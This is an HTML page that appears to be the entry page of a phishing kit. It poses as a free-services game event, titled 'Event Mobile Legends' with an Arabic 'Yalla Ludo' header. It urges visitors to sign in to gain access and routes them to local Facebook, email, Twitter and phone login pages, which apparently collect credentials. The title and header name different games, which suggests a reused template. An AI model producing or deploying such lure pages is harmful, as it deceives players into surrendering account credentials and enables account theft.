<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css"
        integrity="sha384-9aIt2nRpC12Uk9gS9baDl411NQApFmC26EwAOH8WgZl5MYYxFfc+NcPb1dKGj7Sk" crossorigin="anonymous">
    <link rel="stylesheet"
        href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.css">
    <link rel="stylesheet" href="style.css">
    <title>Event Mobile Legends</title>
    <link rel="shorcut icon" href="https://h.top4top.io/p_2393r83af1.jpg">
</head>

<body>
    <div class="mobile">
        <div class="navbar">
            <img src="https://h.top4top.io/p_2393r83af1.jpg">
            <div class="text-left text-white text-header">
                يلا لودو<br>
                <span>خدمات مجانيه لفترات محدوده</span>
            </div>
        </div>
        <div class="row">
            <div class="col-md-12 col-12">
                <div id="carouselExampleIndicators" class="carousel slide" data-ride="carousel">

                    <div class="carousel-inner">
                        <div class="carousel-item active">

                        </div>
                        <div class="carousel-item">

                        </div>
                    </div>
                </div>
            </div>
        </div>
        <html>
        <div class="row mt-1 mb-1">
            <div class="col-md-12 col-12">
                <div class="clearfix"></div>
            </div>
        </div>

        <div class="row mt-4 d-block mx-auto">
            <div class="col-md-12 col-12 mb-4 text-white text-center" style="font-size: 0.8em;">
                سجل بحسابك للحصول علئ صلاحيه الوصول
            </div>
            <div class="col-md-12 col-12">
                <button class="btn btn-primary text-left" onclick="location.href='facebook/index.html'"> <i
                        class="zmdi zmdi-facebook" style="font-size: 2.9em;"></i>
                    <div class="txtLogin2">تسجيل الدخول بٲستخدام فيسبوك</div>
                </button>
            </div>
            <div class="col-md-12 col-12 mt-3">
                <button class="btn btn-primary text-left"
                    style="background-color: #ffa500 !important; border: 1px solid #ff4133 !important;"
                    onclick="location.href='email/index.html'"> <i class="zmdi zmdi-email"
                        style="font-size: 2.9em;"></i>
                    <div class="txtLogin2">التسجيل بٲستخدام الاميل</div>
                </button>
            </div>
            <div class="col-md-12 col-12 mt-3">
                <button class="btn btn-primary text-left"
                    style="background-color: #00acee !important; border: 1px solid #00acee !important;"
                    onclick="location.href='twitter/index.html'"> <i class="zmdi zmdi-twitter"
                        style="font-size: 2.9em;"></i>
                    <div class="txtLogin2">التسجيل بٲستخدام تويتر</div>
                </button>
            </div>
            <div class="col-md-12 col-12 mt-3">
                <button class="btn btn-primary text-left"
                    style="background-color: #ffa500 !important; border: 1px solid #ff4133 !important;"
                    onclick="location.href= 'phone/index.html'"> <i class="zmdi zmdi-phone"
                        style="font-size: 2.9em;"></i>
                    <div class="txtLogin2">التسجيل بٲستخدام رقم الهاتف</div>
                </button>
            </div>
            <div class="mb-3"></div>
        </div>

        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js"
            integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo"
            crossorigin="anonymous"></script>
        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/js/bootstrap.min.js"
            integrity="sha384-OgVRvuATP1z7JjHLkuOU7Xw704+h835Lr+6QL9UvYjZE3Ipu6Tp75j7Bh/kR0JKI"
            crossorigin="anonymous"></script>
        <script src="static/js/index.js"></script>
</body>

</html>